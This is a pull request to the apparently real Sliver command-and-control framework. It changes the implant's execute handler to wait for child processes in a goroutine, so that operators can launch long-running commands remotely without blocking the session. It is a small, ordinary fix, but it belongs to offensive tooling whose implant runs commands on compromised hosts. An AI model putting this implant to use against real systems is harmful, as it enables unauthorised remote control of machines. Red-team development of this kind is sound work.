### PR TITLE
Unblock execute command if no output is requested

### DIFF
--- a/implant/sliver/handlers/handlers.go
+++ b/implant/sliver/handlers/handlers.go
@@ -607,12 +607,16 @@ func executeHandler(data []byte, resp RPCResponse) {
 		}
 	} else {
 		err = cmd.Start()
-		cmd.Wait()
 		if err != nil {
 			execResp.Response = &commonpb.Response{
 				Err: fmt.Sprintf("%s", err),
 			}
 		}
+
+		go func() {
+			cmd.Wait()
+		}()
+
 		if cmd.Process != nil {
 			execResp.Pid = uint32(cmd.Process.Pid)
 		}


### PR DESCRIPTION
Follow-up for #1130 , reap zombies but don't block. 

As an operator using an interactive session, I want to be able to run a command like `execute /bin/bash -c 'sleep 10'` without having to wait for it to finish, because I need a way to launch long-running processes without making the session unusable.

Waiting for the command in a separate Goroutine allows to return from the task immediately while making sure no defunct processes are left over.